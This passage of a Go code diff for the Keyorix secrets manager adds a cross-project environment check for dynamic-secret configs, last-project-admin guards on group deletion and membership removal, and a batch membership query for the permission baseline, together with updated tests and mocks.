@@ -1000,6 +1000,9 @@ func TestDeprovisionSCIMGroup_StorageError(t *testing.T) {
 	ms.On("GetRoleByName", mock.Anything, "super_admin").Return(nil, errors.New("not found"))
 	ms.On("GetRoleByName", mock.Anything, "admin").Return(nil, errors.New("not found"))
 	ms.On("GetRoleByName", mock.Anything, "system_admin").Return(nil, errors.New("not found"))
+	// guardLastProjectAdminGroupDelete (core-project-members.json#3) runs next;
+	// no group role assignments in this fixture, so it's a no-op too.
+	ms.On("ListGroupRoleAssignments", mock.Anything, uint(10)).Return([]storage.RoleAssignment{}, nil)
 	ms.On("DeleteGroup", mock.Anything, uint(10)).Return(errors.New("not found"))
 	ms.On("LogAuditEvent", mock.Anything, mock.Anything).Return(nil)
 	c := NewKeyorixCore(ms)
@@ -1012,6 +1015,7 @@ func TestDeprovisionSCIMGroup_Success(t *testing.T) {
 	ms.On("GetRoleByName", mock.Anything, "super_admin").Return(nil, errors.New("not found"))
 	ms.On("GetRoleByName", mock.Anything, "admin").Return(nil, errors.New("not found"))
 	ms.On("GetRoleByName", mock.Anything, "system_admin").Return(nil, errors.New("not found"))
+	ms.On("ListGroupRoleAssignments", mock.Anything, uint(10)).Return([]storage.RoleAssignment{}, nil)
 	ms.On("DeleteGroup", mock.Anything, uint(10)).Return(nil)
 	ms.On("LogAuditEvent", mock.Anything, mock.Anything).Return(nil)
 	c := NewKeyorixCore(ms)

--- a/internal/core/core_s27_test.go
+++ b/internal/core/core_s27_test.go
@@ -574,6 +574,9 @@ func TestDeprovisionSCIMGroup_DeleteGroupError_s27(t *testing.T) {
 	ms.On("GetRoleByName", mock.Anything, "super_admin").Return(nil, errors.New("not found"))
 	ms.On("GetRoleByName", mock.Anything, "admin").Return(nil, errors.New("not found"))
 	ms.On("GetRoleByName", mock.Anything, "system_admin").Return(nil, errors.New("not found"))
+	// guardLastProjectAdminGroupDelete (core-project-members.json#3) runs next;
+	// no group role assignments in this fixture, so it's a no-op too.
+	ms.On("ListGroupRoleAssignments", mock.Anything, uint(5)).Return([]storage.RoleAssignment{}, nil)
 	ms.On("DeleteGroup", mock.Anything, uint(5)).Return(errors.New("not found"))
 	c := NewKeyorixCore(ms)
 	err := c.DeprovisionSCIMGroup(context.Background(), 0, 5)

--- a/internal/core/core_s32_test.go
+++ b/internal/core/core_s32_test.go
@@ -90,6 +90,10 @@ func TestApplyGroupMembershipChanges_RemoveAndAdd(t *testing.T) {
 	ms.On("GetRoleByName", mock.Anything, "super_admin").Return(nil, errors.New("not found"))
 	ms.On("GetRoleByName", mock.Anything, "admin").Return(nil, errors.New("not found"))
 	ms.On("GetRoleByName", mock.Anything, "system_admin").Return(nil, errors.New("not found"))
+	// guardLastProjectAdminGroupMembership (core-project-members.json#3) precheck
+	// for user 1's removal — no group role assignments in this fixture, so it's a
+	// no-op too.
+	ms.On("ListGroupRoleAssignments", mock.Anything, uint(10)).Return([]storage.RoleAssignment{}, nil)
 	// user 1 is in current but NOT in want → RemoveUserFromGroup (global: projectID=0).
 	ms.On("RemoveUserFromGroup", mock.Anything, uint(1), uint(10), uint(0)).Return(nil)
 	// user 2 is in current AND in want → no-op.

--- a/internal/core/dynamic_secrets.go
+++ b/internal/core/dynamic_secrets.go
@@ -226,6 +226,20 @@ func (c *KeyorixCore) CreateDynamicSecretConfig(ctx context.Context, req *Create
 	if err := validateCreateDynamicSecretConfigRequest(req); err != nil {
 		return nil, err
 	}
+	// Verify the environment belongs to the stated project — same cross-reference
+	// check CreateSecret already applies (secrets.go), and for the same reason:
+	// without it, a project-admin on project A could bind a dynamic-secret config
+	// whose EnvironmentID points at project B's environment. Downstream reads/leases
+	// stay keyed off the config's own stored ProjectID (not the environment's), so
+	// this wasn't a cross-project value leak, but it's real reference confusion — a
+	// config an operator believes is scoped to (A, envX) is actually associated with
+	// an environment that belongs to a project the creator may have no visibility
+	// into at all.
+	if env, err := c.storage.GetEnvironment(ctx, req.EnvironmentID); err != nil {
+		return nil, fmt.Errorf("environment %d not found", req.EnvironmentID)
+	} else if env.ProjectID != req.ProjectID {
+		return nil, fmt.Errorf("environment %d does not belong to project %d", req.EnvironmentID, req.ProjectID)
+	}
 	if _, err := c.dynamicEngine(req.BackendType); err != nil {
 		return nil, err
 	}

--- a/internal/core/dynamic_secrets_test.go
+++ b/internal/core/dynamic_secrets_test.go
@@ -233,10 +233,13 @@ func TestDynamicSecrets_CreateConfig_DifferentScopeAllowed(t *testing.T) {
 	})
 	assert.NoError(t, err, "the same name in a different environment must succeed")
 
-	// Different project, same environment ID + name.
+	// Different project, same name — with its OWN environment (an environment ID
+	// belongs to exactly one project; reusing project 1's EnvironmentID 2 here would
+	// itself be the reference-confusion case CreateDynamicSecretConfig now rejects).
 	require.NoError(t, db.Create(&models.Project{ID: 4, Name: "dyn-test-project-2"}).Error)
+	require.NoError(t, db.Create(&models.Environment{ID: 5, ProjectID: 4, Name: "dyn-test-env-3"}).Error)
 	_, err = c.CreateDynamicSecretConfig(ctx, &CreateDynamicSecretConfigRequest{
-		Name: "app-db", ProjectID: 4, EnvironmentID: 2, BackendType: "postgres",
+		Name: "app-db", ProjectID: 4, EnvironmentID: 5, BackendType: "postgres",
 		AdminDSN: adminDSNPlain, DefaultTTLSeconds: 3600, CreatedBy: "alice", ActorID: testAdminActorID,
 	})
 	assert.NoError(t, err, "the same name in a different project must succeed")
@@ -247,6 +250,43 @@ func TestDynamicSecrets_CreateConfig_DifferentScopeAllowed(t *testing.T) {
 		AdminDSN: adminDSNPlain, DefaultTTLSeconds: 3600, CreatedBy: "alice", ActorID: testAdminActorID,
 	})
 	assert.NoError(t, err, "a different name in the same project/environment must succeed")
+}
+
+// TestDynamicSecrets_CreateConfig_RejectsCrossProjectEnvironment pins the fix for
+// the reference-confusion follow-up: EnvironmentID 2 belongs to project 1, so a
+// request naming a DIFFERENT project (4) with that same EnvironmentID must be
+// rejected, not silently accepted with a config whose stored ProjectID and actual
+// environment disagree about which project the config belongs to.
+func TestDynamicSecrets_CreateConfig_RejectsCrossProjectEnvironment(t *testing.T) {
+	c, db, _, _ := newDynamicTestCore(t)
+	ctx := context.Background()
+	require.NoError(t, db.Create(&models.Project{ID: 4, Name: "dyn-test-project-2"}).Error)
+
+	_, err := c.CreateDynamicSecretConfig(ctx, &CreateDynamicSecretConfigRequest{
+		Name: "cross-project-cfg", ProjectID: 4, EnvironmentID: 2, BackendType: "postgres",
+		AdminDSN: adminDSNPlain, DefaultTTLSeconds: 3600, CreatedBy: "alice", ActorID: testAdminActorID,
+	})
+	require.Error(t, err, "an environment belonging to a different project must be rejected")
+	assert.Contains(t, err.Error(), "does not belong to project")
+
+	configs, err := c.storage.ListDynamicSecretConfigs(ctx, 4, 2)
+	require.NoError(t, err)
+	assert.Empty(t, configs, "no config must have been created")
+}
+
+// TestDynamicSecrets_CreateConfig_RejectsUnknownEnvironment pins the sibling case:
+// an EnvironmentID with no backing row at all must also be rejected, not just a
+// mismatched one.
+func TestDynamicSecrets_CreateConfig_RejectsUnknownEnvironment(t *testing.T) {
+	c, _, _, _ := newDynamicTestCore(t)
+	ctx := context.Background()
+
+	_, err := c.CreateDynamicSecretConfig(ctx, &CreateDynamicSecretConfigRequest{
+		Name: "nonexistent-env-cfg", ProjectID: 1, EnvironmentID: 999999, BackendType: "postgres",
+		AdminDSN: adminDSNPlain, DefaultTTLSeconds: 3600, CreatedBy: "alice", ActorID: testAdminActorID,
+	})
+	require.Error(t, err)
+	assert.Contains(t, err.Error(), "not found")
 }
 
 func TestDynamicSecrets_ConfigEncryptsAdminDSN(t *testing.T) {
@@ -271,7 +311,7 @@ func TestDynamicSecrets_AdminDSNTransplantBetweenConfigsFailsToDecrypt(t *testin
 	ctx := context.Background()
 	cfgA := mkConfig(t, c, ctx)
 	cfgB, err := c.CreateDynamicSecretConfig(ctx, &CreateDynamicSecretConfigRequest{
-		Name: "other-db", ProjectID: 1, BackendType: "postgres",
+		Name: "other-db", ProjectID: 1, EnvironmentID: 2, BackendType: "postgres",
 		AdminDSN:          "postgres://admin:different@other-db.internal:5432/app",
 		DefaultTTLSeconds: 3600,
 		ActorID:           testAdminActorID,
@@ -524,7 +564,7 @@ func TestDynamicSecrets_MaxTTLClampsIssue(t *testing.T) {
 	c, _, _, fixed := newDynamicTestCore(t)
 	ctx := context.Background()
 	cfg, err := c.CreateDynamicSecretConfig(ctx, &CreateDynamicSecretConfigRequest{
-		Name: "capped", ProjectID: 1, BackendType: "postgres", AdminDSN: adminDSNPlain,
+		Name: "capped", ProjectID: 1, EnvironmentID: 2, BackendType: "postgres", AdminDSN: adminDSNPlain,
 		DefaultTTLSeconds: 600, MaxTTLSeconds: 1800, ActorID: testAdminActorID,
 	})
 	require.NoError(t, err)
@@ -544,7 +584,7 @@ func TestDynamicSecrets_IssueRejectsOverflowingTTLSeconds(t *testing.T) {
 	c, _, _, _ := newDynamicTestCore(t)
 	ctx := context.Background()
 	cfg, err := c.CreateDynamicSecretConfig(ctx, &CreateDynamicSecretConfigRequest{
-		Name: "overflow-guard", ProjectID: 1, BackendType: "postgres", AdminDSN: adminDSNPlain,
+		Name: "overflow-guard", ProjectID: 1, EnvironmentID: 2, BackendType: "postgres", AdminDSN: adminDSNPlain,
 		ActorID: testAdminActorID,
 	})
 	require.NoError(t, err)
@@ -559,7 +599,7 @@ func TestDynamicSecrets_RenewRejectsOverflowingTTLSeconds(t *testing.T) {
 	c, _, _, _ := newDynamicTestCore(t)
 	ctx := context.Background()
 	cfg, err := c.CreateDynamicSecretConfig(ctx, &CreateDynamicSecretConfigRequest{
-		Name: "renew-overflow-guard", ProjectID: 1, BackendType: "postgres", AdminDSN: adminDSNPlain,
+		Name: "renew-overflow-guard", ProjectID: 1, EnvironmentID: 2, BackendType: "postgres", AdminDSN: adminDSNPlain,
 		DefaultTTLSeconds: 600, ActorID: testAdminActorID,
 	})
 	require.NoError(t, err)
@@ -580,14 +620,14 @@ func TestDynamicSecrets_CreateRejectsOverflowingConfigTTLFields(t *testing.T) {
 	ctx := context.Background()
 
 	_, err := c.CreateDynamicSecretConfig(ctx, &CreateDynamicSecretConfigRequest{
-		Name: "bad-default", ProjectID: 1, BackendType: "postgres", AdminDSN: adminDSNPlain,
+		Name: "bad-default", ProjectID: 1, EnvironmentID: 2, BackendType: "postgres", AdminDSN: adminDSNPlain,
 		DefaultTTLSeconds: 20_000_000_000, ActorID: testAdminActorID,
 	})
 	require.Error(t, err)
 	assert.Contains(t, err.Error(), "exceeds the maximum")
 
 	_, err = c.CreateDynamicSecretConfig(ctx, &CreateDynamicSecretConfigRequest{
-		Name: "bad-max", ProjectID: 1, BackendType: "postgres", AdminDSN: adminDSNPlain,
+		Name: "bad-max", ProjectID: 1, EnvironmentID: 2, BackendType: "postgres", AdminDSN: adminDSNPlain,
 		MaxTTLSeconds: 20_000_000_000, ActorID: testAdminActorID,
 	})
 	require.Error(t, err)
@@ -603,7 +643,7 @@ func TestDynamicSecrets_InstallWideMaxLeaseTTLClampsIssue(t *testing.T) {
 	c.SetDynamicMaxLeaseTTL(2 * time.Hour)
 	ctx := context.Background()
 	cfg, err := c.CreateDynamicSecretConfig(ctx, &CreateDynamicSecretConfigRequest{
-		Name: "unbounded", ProjectID: 1, BackendType: "postgres", AdminDSN: adminDSNPlain,
+		Name: "unbounded", ProjectID: 1, EnvironmentID: 2, BackendType: "postgres", AdminDSN: adminDSNPlain,
 		ActorID: testAdminActorID,
 		// No MaxTTLSeconds — the per-config ceiling is unset/unbounded.
 	})
@@ -622,7 +662,7 @@ func TestDynamicSecrets_InstallWideMaxLeaseTTLDefaultsWhenUnset(t *testing.T) {
 	// SetDynamicMaxLeaseTTL is never called — dynamicMaxLeaseTTL stays its zero value.
 	ctx := context.Background()
 	cfg, err := c.CreateDynamicSecretConfig(ctx, &CreateDynamicSecretConfigRequest{
-		Name: "unbounded", ProjectID: 1, BackendType: "postgres", AdminDSN: adminDSNPlain,
+		Name: "unbounded", ProjectID: 1, EnvironmentID: 2, BackendType: "postgres", AdminDSN: adminDSNPlain,
 		ActorID: testAdminActorID,
 	})
 	require.NoError(t, err)
@@ -723,7 +763,7 @@ func TestDynamicSecrets_RevokeEffectiveEphemeralBackendAuditsAsGenuineRevoke(t *
 func TestDynamicSecrets_CreateRejectsDefaultOverMax(t *testing.T) {
 	c, _, _, _ := newDynamicTestCore(t)
 	_, err := c.CreateDynamicSecretConfig(context.Background(), &CreateDynamicSecretConfigRequest{
-		Name: "bad", ProjectID: 1, BackendType: "postgres", AdminDSN: adminDSNPlain,
+		Name: "bad", ProjectID: 1, EnvironmentID: 2, BackendType: "postgres", AdminDSN: adminDSNPlain,
 		DefaultTTLSeconds: 3600, MaxTTLSeconds: 600, ActorID: testAdminActorID,
 	})
 	require.Error(t, err)
@@ -738,7 +778,7 @@ func TestDynamicSecrets_RenewRespectsInstallWideMaxLeaseTTL(t *testing.T) {
 	c.SetDynamicMaxLeaseTTL(20 * time.Minute)
 	ctx := context.Background()
 	cfg, err := c.CreateDynamicSecretConfig(ctx, &CreateDynamicSecretConfigRequest{
-		Name: "unbounded", ProjectID: 1, BackendType: "postgres", AdminDSN: adminDSNPlain,
+		Name: "unbounded", ProjectID: 1, EnvironmentID: 2, BackendType: "postgres", AdminDSN: adminDSNPlain,
 		DefaultTTLSeconds: 300, // no MaxTTLSeconds — per-config ceiling unset
 		ActorID:           testAdminActorID,
 	})
@@ -758,7 +798,7 @@ func TestDynamicSecrets_RenewExtendsAndRespectsMaxTTL(t *testing.T) {
 	c, _, fake, fixed := newDynamicTestCore(t)
 	ctx := context.Background()
 	cfg, err := c.CreateDynamicSecretConfig(ctx, &CreateDynamicSecretConfigRequest{
-		Name: "renewable", ProjectID: 1, BackendType: "postgres", AdminDSN: adminDSNPlain,
+		Name: "renewable", ProjectID: 1, EnvironmentID: 2, BackendType: "postgres", AdminDSN: adminDSNPlain,
 		DefaultTTLSeconds: 600, MaxTTLSeconds: 1200, // 10m default, 20m hard cap
 		ActorID: testAdminActorID,
 	})
@@ -944,12 +984,14 @@ func TestDynamicSecrets_RealFactoryValidatesBackend(t *testing.T) {
 	))
 	require.NoError(t, db.Create(&models.Role{ID: 1, Name: "admin"}).Error)
 	require.NoError(t, db.Create(&models.UserRole{UserID: testAdminActorID, RoleID: 1}).Error)
+	require.NoError(t, db.Create(&models.Project{ID: 1, Name: "real-factory-project"}).Error)
+	require.NoError(t, db.Create(&models.Environment{ID: 2, ProjectID: 1, Name: "real-factory-env"}).Error)
 	fixed := time.Date(2026, 6, 12, 10, 0, 0, 0, time.UTC)
 	c := &KeyorixCore{storage: store.NewLocalStorage(db), now: func() time.Time { return fixed }, passwordPolicy: DefaultPasswordPolicy()}
 
 	for _, backend := range []string{"postgres", "mysql", "mongodb", "redis"} {
 		_, err := c.CreateDynamicSecretConfig(context.Background(), &CreateDynamicSecretConfigRequest{
-			Name: backend + "-cfg", ProjectID: 1, BackendType: backend, AdminDSN: "admin:p@tcp(h:3306)/",
+			Name: backend + "-cfg", ProjectID: 1, EnvironmentID: 2, BackendType: backend, AdminDSN: "admin:p@tcp(h:3306)/",
 			ActorID: testAdminActorID,
 		})
 		require.NoError(t, err, "backend %s must be accepted", backend)

--- a/internal/core/groups.go
+++ b/internal/core/groups.go
@@ -76,8 +76,9 @@ func (c *KeyorixCore) UpdateGroup(ctx context.Context, actorID uint, req *Update
 
 // DeleteGroup deletes a group by ID. See CreateGroup for actorID semantics. It
 // refuses to delete a group holding the install's last global-admin-conferring
-// role grant (#107; see guardLastGlobalAdminGroupDelete) — deleting a group
-// cascades to remove every role grant it holds.
+// role grant (#107; see guardLastGlobalAdminGroupDelete) OR any project's last
+// roles.assign-conferring grant (see guardLastProjectAdminGroupDelete) —
+// deleting a group cascades to remove every role grant it holds, at every scope.
 func (c *KeyorixCore) DeleteGroup(ctx context.Context, actorID, id uint) error {
 	if id == 0 {
 		return fmt.Errorf("%s: %s", i18n.T("ErrorValidation", nil), "group ID is required")
@@ -87,6 +88,9 @@ func (c *KeyorixCore) DeleteGroup(ctx context.Context, actorID, id uint) error {
 		return fmt.Errorf("%s: %w", i18n.T("ErrorRetrievalFailed", nil), err)
 	}
 	if err := c.guardLastGlobalAdminGroupDelete(ctx, id); err != nil {
+		return err
+	}
+	if err := c.guardLastProjectAdminGroupDelete(ctx, id); err != nil {
 		return err
 	}
 	if err := c.storage.DeleteGroup(ctx, id); err != nil {
@@ -255,12 +259,17 @@ func (c *KeyorixCore) AddUserToGroupGlobal(ctx context.Context, actorID, userID,
 // RemoveUserFromGroup removes a user from a group at the given projectID scope.
 // See AddUserToGroup for actorID semantics. It refuses to remove a user whose
 // global admin-tier authority comes solely from this group's role grant when no
-// other admin route remains (#107; see guardLastGlobalAdminMembership).
+// other admin route remains (#107; see guardLastGlobalAdminMembership), OR whose
+// removal would leave some project this group administers with no roles.assign
+// holder (see guardLastProjectAdminGroupMembership).
 func (c *KeyorixCore) RemoveUserFromGroup(ctx context.Context, actorID, userID, groupID, projectID uint) error {
 	if userID == 0 || groupID == 0 {
 		return fmt.Errorf("%s: user ID and group ID are required", i18n.T("ErrorValidation", nil))
 	}
 	if err := c.guardLastGlobalAdminMembership(ctx, userID, groupID); err != nil {
+		return err
+	}
+	if err := c.guardLastProjectAdminGroupMembership(ctx, userID, groupID); err != nil {
 		return err
 	}
 	if err := c.storage.RemoveUserFromGroup(ctx, userID, groupID, projectID); err != nil {

--- a/internal/core/mock_storage_test.go
+++ b/internal/core/mock_storage_test.go
@@ -1314,6 +1314,14 @@ func (m *MockStorage) VerifyAuditChain(ctx context.Context, anchor *storage.Audi
 	return args.Get(0).(*storage.AuditChainVerification), args.Error(1)
 }
 
+func (m *MockStorage) MigrateAuditChainEncoding(ctx context.Context, dryRun bool, anchor *storage.AuditChainAnchor) (*storage.AuditChainMigrationResult, error) {
+	args := m.Called(ctx, dryRun, anchor)
+	if args.Get(0) == nil {
+		return nil, args.Error(1)
+	}
+	return args.Get(0).(*storage.AuditChainMigrationResult), args.Error(1)
+}
+
 func (m *MockStorage) CreateAuditCheckpoint(ctx context.Context, cp *models.AuditCheckpoint) error {
 	args := m.Called(ctx, cp)
 	return args.Error(0)

--- a/internal/core/mock_storage_test.go
+++ b/internal/core/mock_storage_test.go
@@ -1008,6 +1008,14 @@ func (m *MockStorage) GetUserGroups(ctx context.Context, userID uint) ([]*models
 	return args.Get(0).([]*models.Group), args.Error(1)
 }
 
+func (m *MockStorage) ListAllUserGroupMemberships(ctx context.Context) ([]storage.UserGroupMembership, error) {
+	args := m.Called(ctx)
+	if args.Get(0) == nil {
+		return nil, args.Error(1)
+	}
+	return args.Get(0).([]storage.UserGroupMembership), args.Error(1)
+}
+
 func (m *MockStorage) AddPasswordHistory(ctx context.Context, userID uint, hash string, at time.Time) error {
 	args := m.Called(ctx, userID, hash, at)
 	return args.Error(0)

--- a/internal/core/permission_baseline.go
+++ b/internal/core/permission_baseline.go
@@ -157,21 +157,20 @@ func (b *permBaselineBuilder) directGrantRows(ctx context.Context, allGrants []*
 // and expiry ride along instead of the caller re-deriving them — the fix for
 // #G25's scope-misrepresentation and missing-expiry-flag gaps on the
 // group-inherited path specifically (GetGroupRoles alone carries neither).
-func (b *permBaselineBuilder) groupGrantRowsForUser(ctx context.Context, u *models.User, groupGrantsByGroup map[uint][]*models.GroupRole, now time.Time) ([]PermissionBaselineRow, error) {
+// groupIDs is u's membership, pre-resolved by the caller from one
+// deployment-wide ListAllUserGroupMemberships query (#G44) instead of a
+// per-user GetUserGroups call — see GetPermissionBaseline's doc for why.
+func (b *permBaselineBuilder) groupGrantRowsForUser(ctx context.Context, u *models.User, groupIDs []uint, groupGrantsByGroup map[uint][]*models.GroupRole, now time.Time) ([]PermissionBaselineRow, error) {
 	var rows []PermissionBaselineRow
-	groups, err := b.k.storage.GetUserGroups(ctx, u.ID)
-	if err != nil {
-		return nil, fmt.Errorf("permission baseline: get groups for user %d: %w", u.ID, err)
-	}
-	for _, g := range groups {
-		for _, grant := range groupGrantsByGroup[g.ID] {
+	for _, groupID := range groupIDs {
+		for _, grant := range groupGrantsByGroup[groupID] {
 			name, err := b.roleName(ctx, grant.RoleID)
 			if err != nil {
-				return nil, fmt.Errorf("permission baseline: get role %d (group %d): %w", grant.RoleID, g.ID, err)
+				return nil, fmt.Errorf("permission baseline: get role %d (group %d): %w", grant.RoleID, groupID, err)
 			}
 			perms, err := b.rolePermNames(ctx, grant.RoleID)
 			if err != nil {
-				return nil, fmt.Errorf("permission baseline: get permissions for role %d (group %d): %w", grant.RoleID, g.ID, err)
+				return nil, fmt.Errorf("permission baseline: get permissions for role %d (group %d): %w", grant.RoleID, groupID, err)
 			}
 			scope := scopeLabel(grant.ProjectID, grant.EnvironmentID)
 			expired := grantExpired(grant.ExpiresAt, now)
@@ -202,15 +201,14 @@ func (b *permBaselineBuilder) groupGrantRowsForUser(ctx context.Context, u *mode
 // than dropped. Each row's Scope reflects the grant's real (project, environment)
 // pair, not just its project.
 //
-// #G44: groupGrantRowsForUser below still runs one GetUserGroups call PER
-// USER — a genuine N+1 whose cost scales with the deployment's own user
-// count, not with any caller-controlled input. Fixing #G25's scope/expiry gap
-// replaced the FORMER per-GROUP GetGroupRoles call with one deployment-wide
-// ListAllGroupRoleGrants query below, but the per-user group-MEMBERSHIP
-// lookup remains. Unlike this group's other members, there's no bound to add
-// here that wouldn't just silently drop users from a compliance/audit report;
-// the real fix is restructuring to batch-load every user's group membership in
-// one or two queries up front. Left unfixed — see REMEDIATION-STATUS.md G44.
+// #G44: group-inherited grant resolution used to run one GetUserGroups call
+// PER USER — a genuine N+1 whose cost scaled with the deployment's own user
+// count, not with any caller-controlled input (unlike this group's other
+// members, there was no bound that wouldn't just silently drop users from a
+// compliance/audit report). Fixed by batch-loading every user's group
+// membership in one ListAllUserGroupMemberships query up front (step 2
+// below), mirroring the ListAllGroupRoleGrants batch-load this function
+// already did for #G25.
 func (k *KeyorixCore) GetPermissionBaseline(ctx context.Context) (*PermissionBaseline, error) {
 	// 1. Load all users, INCLUDING soft-deleted ones (no filter otherwise — we
 	//    want every principal that ever held a grant). See the #G25 doc above:
@@ -240,6 +238,17 @@ func (k *KeyorixCore) GetPermissionBaseline(ctx context.Context) (*PermissionBas
 		groupGrantsByGroup[g.GroupID] = append(groupGrantsByGroup[g.GroupID], g)
 	}
 
+	// One deployment-wide user→group membership query (#G44), pre-grouped by
+	// UserID, instead of one GetUserGroups call per user below.
+	allMemberships, err := k.storage.ListAllUserGroupMemberships(ctx)
+	if err != nil {
+		return nil, fmt.Errorf("permission baseline: list user group memberships: %w", err)
+	}
+	groupIDsByUser := make(map[uint][]uint, len(users))
+	for _, m := range allMemberships {
+		groupIDsByUser[m.UserID] = append(groupIDsByUser[m.UserID], m.GroupID)
+	}
+
 	// Build quick lookup map (direct-grant path only — the group-inherited path
 	// already has the full *models.User in hand from `users`).
 	userByID := make(map[uint]*userBaseline, len(users))
@@ -262,7 +271,7 @@ func (k *KeyorixCore) GetPermissionBaseline(ctx context.Context) (*PermissionBas
 
 	// 4. Group-inherited grants.
 	for _, u := range users {
-		groupRows, err := b.groupGrantRowsForUser(ctx, u, groupGrantsByGroup, now)
+		groupRows, err := b.groupGrantRowsForUser(ctx, u, groupIDsByUser[u.ID], groupGrantsByGroup, now)
 		if err != nil {
 			return nil, err
 		}

--- a/internal/core/permission_baseline_test.go
+++ b/internal/core/permission_baseline_test.go
@@ -37,6 +37,7 @@ func TestGetPermissionBaseline_Empty(t *testing.T) {
 		Return([]*models.User{}, int64(0), nil)
 	store.On("ListAllUserRoleGrants", mock.Anything).Return([]*models.UserRole{}, nil)
 	store.On("ListAllGroupRoleGrants", mock.Anything).Return([]*models.GroupRole{}, nil)
+	store.On("ListAllUserGroupMemberships", mock.Anything).Return([]stg.UserGroupMembership{}, nil)
 
 	baseline, err := c.GetPermissionBaseline(ctx)
 	require.NoError(t, err)
@@ -58,7 +59,7 @@ func TestGetPermissionBaseline_DirectGrant_GlobalScope(t *testing.T) {
 	store.On("GetRole", mock.Anything, uint(5)).Return(&models.Role{ID: 5, Name: "Admin"}, nil)
 	store.On("GetRolePermissions", mock.Anything, uint(5)).
 		Return([]*models.Permission{{Name: "secrets.read"}, {Name: "secrets.write"}}, nil)
-	store.On("GetUserGroups", mock.Anything, uint(10)).Return([]*models.Group{}, nil)
+	store.On("ListAllUserGroupMemberships", mock.Anything).Return([]stg.UserGroupMembership{}, nil)
 
 	baseline, err := c.GetPermissionBaseline(ctx)
 	require.NoError(t, err)
@@ -89,7 +90,7 @@ func TestGetPermissionBaseline_DirectGrant_ProjectScope(t *testing.T) {
 	store.On("GetRole", mock.Anything, uint(7)).Return(&models.Role{ID: 7, Name: "Viewer"}, nil)
 	store.On("GetRolePermissions", mock.Anything, uint(7)).
 		Return([]*models.Permission{{Name: "secrets.read"}}, nil)
-	store.On("GetUserGroups", mock.Anything, uint(11)).Return([]*models.Group{}, nil)
+	store.On("ListAllUserGroupMemberships", mock.Anything).Return([]stg.UserGroupMembership{}, nil)
 
 	baseline, err := c.GetPermissionBaseline(ctx)
 	require.NoError(t, err)
@@ -115,7 +116,7 @@ func TestGetPermissionBaseline_DirectGrant_EnvironmentScope(t *testing.T) {
 	store.On("GetRole", mock.Anything, uint(7)).Return(&models.Role{ID: 7, Name: "Viewer"}, nil)
 	store.On("GetRolePermissions", mock.Anything, uint(7)).
 		Return([]*models.Permission{{Name: "secrets.read"}}, nil)
-	store.On("GetUserGroups", mock.Anything, uint(15)).Return([]*models.Group{}, nil)
+	store.On("ListAllUserGroupMemberships", mock.Anything).Return([]stg.UserGroupMembership{}, nil)
 
 	baseline, err := c.GetPermissionBaseline(ctx)
 	require.NoError(t, err)
@@ -129,14 +130,14 @@ func TestGetPermissionBaseline_GroupInheritedGrant(t *testing.T) {
 	ctx := context.Background()
 
 	user := &models.User{ID: 12, Username: "carol", Email: "carol@example.com"}
-	group := &models.Group{ID: 20}
 	groupGrant := &models.GroupRole{GroupID: 20, RoleID: 9}
 
 	store.On("ListUsers", mock.Anything, userFilterPageSize(100000)).
 		Return([]*models.User{user}, int64(1), nil)
 	store.On("ListAllUserRoleGrants", mock.Anything).Return([]*models.UserRole{}, nil)
 	store.On("ListAllGroupRoleGrants", mock.Anything).Return([]*models.GroupRole{groupGrant}, nil)
-	store.On("GetUserGroups", mock.Anything, uint(12)).Return([]*models.Group{group}, nil)
+	store.On("ListAllUserGroupMemberships", mock.Anything).
+		Return([]stg.UserGroupMembership{{UserID: 12, GroupID: 20}}, nil)
 	store.On("GetRole", mock.Anything, uint(9)).Return(&models.Role{ID: 9, Name: "Operator"}, nil)
 	store.On("GetRolePermissions", mock.Anything, uint(9)).
 		Return([]*models.Permission{{Name: "audit.read"}}, nil)
@@ -162,14 +163,14 @@ func TestGetPermissionBaseline_GroupInheritedGrant_EnvironmentScope(t *testing.T
 	ctx := context.Background()
 
 	user := &models.User{ID: 16, Username: "grace", Email: "grace@example.com"}
-	group := &models.Group{ID: 21}
 	groupGrant := &models.GroupRole{GroupID: 21, RoleID: 9, ProjectID: 5, EnvironmentID: 2}
 
 	store.On("ListUsers", mock.Anything, userFilterPageSize(100000)).
 		Return([]*models.User{user}, int64(1), nil)
 	store.On("ListAllUserRoleGrants", mock.Anything).Return([]*models.UserRole{}, nil)
 	store.On("ListAllGroupRoleGrants", mock.Anything).Return([]*models.GroupRole{groupGrant}, nil)
-	store.On("GetUserGroups", mock.Anything, uint(16)).Return([]*models.Group{group}, nil)
+	store.On("ListAllUserGroupMemberships", mock.Anything).
+		Return([]stg.UserGroupMembership{{UserID: 16, GroupID: 21}}, nil)
 	store.On("GetRole", mock.Anything, uint(9)).Return(&models.Role{ID: 9, Name: "Operator"}, nil)
 	store.On("GetRolePermissions", mock.Anything, uint(9)).
 		Return([]*models.Permission{{Name: "audit.read"}}, nil)
@@ -198,14 +199,16 @@ func TestGetPermissionBaseline_RolePermissionsCached(t *testing.T) {
 	store.On("GetRole", mock.Anything, uint(5)).Return(&models.Role{ID: 5, Name: "Admin"}, nil)
 	store.On("GetRolePermissions", mock.Anything, uint(5)).
 		Return([]*models.Permission{{Name: "secrets.read"}}, nil)
-	store.On("GetUserGroups", mock.Anything, uint(13)).Return([]*models.Group{}, nil)
-	store.On("GetUserGroups", mock.Anything, uint(14)).Return([]*models.Group{}, nil)
+	store.On("ListAllUserGroupMemberships", mock.Anything).Return([]stg.UserGroupMembership{}, nil)
 
 	baseline, err := c.GetPermissionBaseline(ctx)
 	require.NoError(t, err)
 	assert.Len(t, baseline.Rows, 2)
 	// GetRolePermissions should have been called exactly once for the cached role.
 	store.AssertNumberOfCalls(t, "GetRolePermissions", 1)
+	// #G44: ListAllUserGroupMemberships must be called exactly once — the whole
+	// point of the batch-load fix is NOT one GetUserGroups call per user.
+	store.AssertNumberOfCalls(t, "ListAllUserGroupMemberships", 1)
 }
 
 func TestGetPermissionBaseline_SkipsGrantsForMissingUsers(t *testing.T) {
@@ -223,6 +226,7 @@ func TestGetPermissionBaseline_SkipsGrantsForMissingUsers(t *testing.T) {
 		Return([]*models.User{}, int64(0), nil)
 	store.On("ListAllUserRoleGrants", mock.Anything).Return([]*models.UserRole{grant}, nil)
 	store.On("ListAllGroupRoleGrants", mock.Anything).Return([]*models.GroupRole{}, nil)
+	store.On("ListAllUserGroupMemberships", mock.Anything).Return([]stg.UserGroupMembership{}, nil)
 
 	baseline, err := c.GetPermissionBaseline(ctx)
 	require.NoError(t, err)
@@ -268,6 +272,68 @@ func TestGetPermissionBaseline_ListGroupGrantsError(t *testing.T) {
 	require.Error(t, err)
 }
 
+func TestGetPermissionBaseline_ListUserGroupMembershipsError(t *testing.T) {
